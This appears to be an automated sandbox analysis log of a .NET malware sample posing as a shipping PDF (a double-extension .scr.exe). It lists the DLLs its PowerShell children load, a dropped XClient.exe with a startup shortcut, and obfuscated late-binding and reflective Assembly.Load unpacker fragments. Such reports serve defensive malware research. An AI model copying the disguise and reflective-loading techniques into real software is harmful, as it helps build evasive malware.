Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: XClient.lnk.3.dr

LNK file: ..\..\..\..\..\XClient.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: SmhB.pdb source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, XClient.exe.3.dr
Source:	Binary string: SmhB.pdbSHA256 source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, XClient.exe.3.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2b99d98.1.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.5560000.5.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	.Net Code: hx3Wk7SK51Mj25qRcDs System.Reflection.Assembly.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	.Net Code: hx3Wk7SK51Mj25qRcDs System.Reflection.Assembly.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	.Net Code: hx3Wk7SK51Mj25qRcDs System.Reflection.Assembly.Load(byte[])

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: 0xB1B46C76 [Sun Jun 22 20:17:58 2064 UTC]

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_04F9B8B0 push eax; mov dword ptr [esp], ecx	0_2_04F9B8B4
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_08965648 pushfd ; iretd	0_2_089656F9
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_089656F0 pushfd ; iretd	0_2_089656F9
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 0_2_08965638 pushad ; iretd	0_2_08965639
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E04488 pushfd ; ret	3_2_05E04489
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Code function: 3_2_05E043A8 push eax; ret	3_2_05E043A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_028C636D push eax; ret	4_2_028C6381
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_028C3AA8 push ebx; retf	4_2_028C3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_028C3A63 push ebx; retf	4_2_028C3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_028C2D09 push 04B8070Fh; retf	4_2_028C2D0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_078E1BCC pushfd ; retf	7_2_078E1BD5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C850E8 pushfd ; ret	9_2_04C85092
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C842ED push esi; ret	9_2_04C84312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C842A8 push esi; ret	9_2_04C84312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C873C0 pushfd ; rep ret	9_2_04C873D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04C86378 push eax; ret	9_2_04C86381
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07A41743 push 08C3A9B8h; ret	9_2_07A41763
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07A43596 push eax; iretd	9_2_07A435A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07A42CA8 pushad ; retf	9_2_07A43279
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08D95298 push 7DE8C88Bh; ret	9_2_08D952A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_0486629D push eax; ret	12_2_04866351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04865DDB push esp; ret	12_2_04865DE3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04865EF0 push 8B05A323h; retf	12_2_04865EF5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_048668FC pushad ; ret	12_2_04866903
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04866820 push eax; ret	12_2_04866833

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Static PE information: section name: .text entropy: 7.628561188344063
Source: XClient.exe.3.dr	Static PE information: section name: .text entropy: 7.628561188344063

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, fVLhd3v9vj97x0ul7x.cs	High entropy of concatenated method names: 'K3AxlOLVKI', 'VarxJn84gX', 'PJSxpaFyMT', 'C4oxQnAqnI', 'kPTxcx3RIZ', 'KcIx8ir71C', 'al4xg4pRkI', 'ar3xP1CbjZ', 'I97x28B1O4', 'PKCxfWURYJ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, oCoC4rSRQ5DbVVPrMB.cs	High entropy of concatenated method names: 'u0Jn4DtwQR', 'vd8nEkQTGN', 'F8nnsFxcrI', 'cF9Yu8HPWdNl3mAgAl2', 'mVgTqRH9pFjA5MwAUEJ', 'KtydHfHCsXaAUGQ1Zbo'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, crTyvuEhkkEYNy7pZ3.cs	High entropy of concatenated method names: 'whnA77HBsa', 'dQ7AGfZmg6', 'u8jAMq9Pip', 'ehRABaHdYk', 'qxEALDUgxD', 'oCWAd4r8Gg', 'GfYAo6gujn', 'iEfAvNanha', 'pbEAHHwQC2', 'S0DAh8rQp8'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, a7PBht10ILexMfENh5.cs	High entropy of concatenated method names: 'ty1ooJHs8noJ0FDr7rS', 'gktV4MHAI2JZgw6A5x3', 'RnvnUD2VkT', 'iIIntGEINW', 'Y7inmawLHh', 'jKlQ7UHGxLUlLuSbvOt', 'FrB5qkHBd4kY3hwgQaa', 'VNw4mHHeNyhFl9YILyi'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, nTd64leKOQkBShM71J.cs	High entropy of concatenated method names: 'HCrMnLx7W', 'HEaBLNJUZ', 'nGJd5VT8d', 'XCNoXvuef', 'ShLHn2dgQ', 'jmbhBiaek', 'fat5O0pl1xPh5SRD1F', 'ltuW3029XaQBRHk5PO', 'FxyUnsRso', 'y6PmPcuvN'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, nv80huHyIi5Z0ypRpF.cs	High entropy of concatenated method names: 'G5ibBgK5QF', 'gcXbdVUujo', 'yK7bvwjPme', 'omYbH6Td5n', 'ANZbFOshJO', 'S7lbITtPlX', 'NYnbKN9gW3', 'MfrbU1SAhn', 'aDDbticM2Q', 'YU1bm2unaD'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, GdnMsM2ZpWaqTfDgbs.cs	High entropy of concatenated method names: 'pHwUOVN7Or', 'ErfU1RIwFR', 'qPnUkI1P2i', 'yTgUwTWqam', 'oVEUl5RCci', 'oIKUSwI65i', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, cRuI1ZQuA6WoRBZi6G.cs	High entropy of concatenated method names: 'gd7KiR3hi3', 'slpKDMW70S', 'ToString', 'OAQKjAaY9H', 'gcuKx9hB0d', 'yUIKbZXXeI', 'gIjKTq8hE6', 'h2QKnYMHGV', 'NklKA7JSCl', 'dBiKXmNUi1'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, OplsHdzJvA0crPbN5m.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Nt9ADeIG', 'sSUtFjmGmJ', 'jlYtIt1WMT', 'KUOtKERjk2', 'iH8tUuhNHm', 'Or5ttsyaX1', 'QaKtmqbuE3'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, bX9Fp8rNJpntZjUhZX0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FAIml1Vvh1', 'J3HmJaeyYt', 'k6MmpqnVku', 'JTomQd9BAT', 'hkKmc6IQqT', 'bANm8Aj7ai', 'wZVmgTfGZt'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	High entropy of concatenated method names: 'gVbNVtZ62T', 'ObvNjIoYTU', 'RCPNxaUWlK', 'AKuNboDfQc', 'DTpNTbVqOQ', 'Op2NnfLkCn', 'F8WNAjS3ND', 'xulNXYfi3f', 'YAYNu8VUtU', 'uCgNiCRPeY'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, WKYp3LxaO9xCgRuSVE.cs	High entropy of concatenated method names: 'Dispose', 'QUCr2EEIRR', 'l6Xe1mZtub', 'MmtOONhLeV', 'vcArfml14L', 'UcJrzgRJ0t', 'ProcessDialogKey', 'LSOeydnMsM', 'vpWeraqTfD', 'WbseekRito'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, qhYTVHqPF5FU4j8DXE.cs	High entropy of concatenated method names: 'aE79vAZDC2', 'GjS9HF8Wnh', 'gOs9OPlSXR', 'B4Q91gg9mK', 'sFG9wOKrdq', 'hhZ9SwuKqN', 'OIX94xU5UB', 'hoD9Yy4UJe', 'W1F93UZ2o8', 'cft90dsjhg'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, gbbVA14tBQCOnqKU9Y.cs	High entropy of concatenated method names: 'DUfAjERvfC', 'IErAbUc97J', 'JZ6AnQkN2F', 'J4UnfcEXMV', 'rPJnzOK7Hv', 'CCJAyBULpZ', 'TfpArh6bBv', 'QRIAe6iWt2', 'zwgAN4uRWD', 'AB4AR7xLgg'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, UAml14PLccJgRJ0t4S.cs	High entropy of concatenated method names: 'UwgUj4PTKm', 'lG1UxpBtKI', 'BB7UbmhkXR', 'nF8UTuAioQ', 's3xUn9Z96C', 'i9TUAlGsae', 'IhsUX9TMZW', 'lrLUud4Zkw', 'CQuUiV7JRT', 'cfDUDmKxpR'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, tAcbefryMggPVwpTLx7.cs	High entropy of concatenated method names: 'OiQt77QEWV', 'IqAtG9rvsK', 'ctCtM0VyVp', 'wA1tBYOj2s', 'y1mtL1nKmK', 'WlGtdJlRdr', 'JemtoeZPJu', 'tAdtvh0fNI', 'rU9tHRIjXg', 'UTFtht5mEC'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, HRito2ftyhW443Hxbl.cs	High entropy of concatenated method names: 'Ldmtr7evZA', 'm7ktN1QBMx', 'NZmtRQTQP1', 'uoCtja763x', 'VHitxoBVFL', 'ITdtTdvI5L', 'A3GtncT0to', 'QKqUgQi5yM', 'PFxUPkSYGo', 'LCoU2djfgO'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, uNjnQspJ64xXuolXpg.cs	High entropy of concatenated method names: 'ToString', 'vOuI0AF8bg', 'PSyI1UJcNe', 'g7lIkURrQX', 'PgGIw5YwKO', 'mFYISaX6qq', 'HQ2Isj14Py', 'RpXI4noFHd', 'TL8IYeTBqn', 'swiIENsWLM'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, jl3RAe88u4hlLD3Mj7.cs	High entropy of concatenated method names: 'PtPKPqDyfD', 'CPfKf7clCW', 'OeIUyyUOCt', 'Du3UrGmGIc', 'lH5K0wMsgX', 'hj7KCPBvKK', 'kbgKq2OpiJ', 'NEPKlG09aV', 'jf7KJ0Kpai', 'oeQKpu18pQ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, pLg0YmhpR8uYAIHdvu.cs	High entropy of concatenated method names: 'vlZTLOP36D', 'kGmTo9YIU3', 'JrhbkND3gA', 'w8WbwZhdjh', 'AAkbSjOGWH', 'zWRbstnUfc', 'Qk1b4i2xs1', 'BxBbYXbYYI', 'EMQbEorGHy', 'bc9b3UUQ5K'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, V20jGCR5LKTDtuJD4U.cs	High entropy of concatenated method names: 'hwjrAVLhd3', 'ovjrX97x0u', 'lyIrii5Z0y', 'SRprDFILg0', 'pHdrFvuk41', 'NRprIkb9Be', 'SR9HnvbuAZJjDGALZh', 'JWWe3i6aDapwC80w9r', 'RcorrsiSy6', 'eMOrNVbTjy'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, H413RpOkb9Beefy6KO.cs	High entropy of concatenated method names: 'GIpnVXkXDv', 'NNunx1tWZS', 'sobnT7Wuqg', 'M3NnAgysns', 'dsdnXCdgVC', 'u8wTc2RkIw', 'YLWT8JPkNa', 'kG4Tghf4cn', 'foRTP63LKh', 'NTWT23UpQZ'
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, KvQxCNlNtBHxoGnWPu.cs	High entropy of concatenated method names: 'TxJF3EEgX5', 'tfmFCVDIi2', 'vCCFlRoqvO', 'FMZFJWha18', 'BwZF17Awnt', 'gLFFkQK5wk', 'O6ZFwJW45Q', 'b3HFSX02Ew', 'GlAFsXEIGR', 'v8KF4NRq2r'
